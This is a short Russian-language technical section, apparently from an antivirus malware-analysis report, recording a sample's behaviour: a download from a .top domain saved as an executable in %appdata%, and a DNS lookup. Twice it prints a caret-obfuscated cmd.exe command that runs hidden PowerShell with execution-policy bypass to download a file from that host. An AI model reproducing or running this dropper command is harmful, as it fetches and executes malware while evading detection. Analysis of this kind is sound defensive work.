Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^w^er^sHELL.^EXe^ ^-^eXE^CuTionPOL^I^Cy^ bYpA^s^s ^-n^O^Pro^FILe ^-w^In^DOW^STY^lE ^H^IddEN^ (N^eW-oBJec^t ^s^yst^e^m.NEt^.weB^clieNt^).^D^ow^Nloa^dF^i^le('http://www.fapoergol....
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "PO^w^er^sHELL.^EXe^ ^-^eXE^CuTionPOL^I^Cy^ bYpA^s^s ^-n^O^Pro^FILe ^-w^In^DOW^STY^lE ^H^IddEN^ (N^eW-oBJec^t ^s^yst^e^m.NEt^.weB^clieNt^).^D^ow^Nloa^dF^i^le('http://www.fapoergol....' (со скрытым окном)